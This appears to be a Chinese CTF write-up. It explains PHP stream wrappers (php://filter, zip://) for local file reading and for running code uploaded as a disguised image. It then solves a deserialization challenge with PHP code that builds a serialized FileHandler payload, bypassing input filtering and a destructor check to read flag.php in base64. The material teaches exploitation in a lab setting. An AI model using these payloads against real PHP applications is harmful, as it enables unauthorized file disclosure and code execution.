本文介绍了PHP中的伪协议如file://、php://filter以及zip://等在CTF中的应用,展示了如何通过这些协议读取本地文件。同时,针对is_valid()和destruct()的防护机制,作者提供了绕过方法并给出了实际示例。
题目图片:
先介绍php伪协议
file:// 协议:在CTF中通常用来读取本地文件的且不受配置文件中allow_url_fopen与allow_url_include的影响。
php://filter:
| 名称 | 描述 |
|---|---|
| resource<—>要过滤的数据流 | 这是个必要参数。它指定了你需要筛选过滤的数据流(简单来说就是你的数据来源) |
| read<—>读链的筛选列表 | 这个参数可选。可以设定一个或多个过滤器名称。以管道符(/)分隔 |
| write<—>读链的筛选列表 | 这个参数可选。可以设定一个或多个过滤器名称。以管道符(/)分隔 |
例
读:php://filter/resource=文件名 php://filter/read=convert.base64-encode/resource=文件名 写:php://filter/resource=文件名&txt=文件内容 php://filter/write=convert.base64-encode/resource=文件名&txt=文件内容
zip://,bzip2://,zlib://协议
zip://, bzip2://, zlib:// 均属于压缩流,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名
例如: zip://archive.zip#dir/file.txt 先将要执行的PHP代码写好文件名为phpcode.txt,将phpcode.txt进行zip压缩,压缩文件名为file.zip,如果可以上传zip文件便直接上传,若不能便将file.zip重命名为file.jpg后在上传,其他几种压缩格式也可以这样操作。 由于#在get请求中会将后面的参数忽略所以使用get请求时候应进行url编码为%23,且此处经过测试相对路径是不可行,所以只能用绝对路径。
两个防护:
一,is_valid() 要求我们传入的str的每个字母的ascii值在32和125之间。因为protected属性在序列化之后会出现不可见字符\00*\00,不符合上面的要求。
绕过方法:因为php7.1以上的版本对属性类型不敏感,所以可以将属性改为public,public属性序列化不会出现不可见字符
二,destruct()魔术方法
绕过方法:可以使传入的op是数字2,从而使第一个强比较返回false,而使第二个弱比较返回true.
<?php
class FileHandler {
public $op = 2;
public $filename = "flag.php";
public $content = "1"; //因为destruce函数会将content改为空,所以content的值随意(但是要满足is_valid()函数的要求)
}
$a = new FileHandler();
$b = serialize($a);
echo $b;
?>
也可以用伪协议
<?php
class FileHandler {
public $op = 2;
public $filename = "php://filter/read=convert.base64-encode/resource=flag.php";
public $content = "2";
}
$a = new FileHandler();
$b = serialize($a);
echo $b;
?>
在线php运行工具如下:
O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";s:1:"1";}
拼接到str中:PD9waHAgJGZsYWc9J2ZsYWd7ZmMzZmQwYzMtYzNhNi00MjYxLTljZDctODM3YWFjZGQ1NmI3fSc7Cg==
得到flag:
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
